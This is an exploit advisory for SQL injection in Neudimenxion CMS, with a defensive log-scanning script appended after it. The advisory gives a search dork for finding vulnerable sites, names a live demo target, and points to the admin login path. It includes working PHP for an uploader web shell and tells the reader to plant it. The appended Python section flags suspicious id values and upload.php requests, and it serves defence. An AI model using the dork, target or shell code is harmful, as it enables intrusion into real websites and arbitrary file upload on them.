Neudimenxion CMS SQL Injection

2011.07.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

=========================================================
# Exploit Title : Neudimenxion CMS SQL Injection
# Date : 17 July 2011
# Author : Netrondoank aka netron
# Platform/Tested on : Linux
# myweb : http://www.ilmuhacker.org
# Version : none
# Software Link : http://www.neudimenxion.com/
# dork : "CMS © Neudimenxion.com"
======================================================================
# vuln here

http://site/path/directories_detail.php?id=[sqli]

demo
http://wismasaberkas.com.my/web/directories_detail.php?id=1

Login Admin
http://site/admin_login.php
======================================================================
use this exploit to make upload.php
upload your shell via edit news or via event or via tamper data

<?php
echo '<b>RI<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        echo '<b>Upload Success !!!</b><br><br>';
    } else {
        echo '<b>Upload Fail !!!</b><br><br>';
    }
}
?>
======================================================================
[+] Special thanks to all friends @ site : IndonesianSecurity.info + palembang Hackerlink + Blitar hackerlink + hacker newbie
[+] Kimmmonosz + Budi anja (biohazzard) + Klicak + jos ali joe + Pokeng + Crashblack + nesta + andy_william
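For defenders reviewing web server logs of a site running this CMS, the following is an added example (not part of the original advisory) that flags the two request patterns the advisory describes: a non-integer id value on directories_detail.php and any request for upload.php. It assumes combined-format access logs, that id is meant to be a plain integer, and that the site has no legitimate upload.php; the log lines and IP addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Start of a combined-format access log line: ip, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
INT_ID = re.compile(r"[0-9]{1,10}")  # assumption: id is a short decimal integer

def classify(line):
    """Return a finding string for one log line, or None if it looks normal."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    script = url.path.rsplit("/", 1)[-1].lower()
    if script == "directories_detail.php":
        # parse_qs URL-decodes values, so encoded quotes and spaces are visible.
        ids = parse_qs(url.query, keep_blank_values=True).get("id", [])
        if len(ids) > 1 or any(not INT_ID.fullmatch(v) for v in ids):
            return "non-integer id on directories_detail.php"
    elif script == "upload.php":
        # File name used in the advisory; assumed not to exist on a clean install.
        return "request for upload.php"
    return None

def scan(lines):
    """Return (client_ip, finding) pairs for every flagged line, in order."""
    hits = []
    for line in lines:
        finding = classify(line)
        if finding:
            hits.append((LOG_RE.match(line).group("ip"), finding))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Jul/2011:10:00:01 +0000] "GET /web/directories_detail.php?id=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Jul/2011:10:02:13 +0000] "GET /web/directories_detail.php?id=1%27 HTTP/1.1" 200 312',
    '198.51.100.7 - - [17/Jul/2011:10:09:40 +0000] "POST /web/upload.php HTTP/1.1" 200 198',
    '192.0.2.10 - - [17/Jul/2011:10:11:02 +0000] "GET /web/index.php HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

A flagged id request followed by an upload.php request from the same client is the sequence to prioritise for incident response.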

References:

http://www.neudimenxion.com/

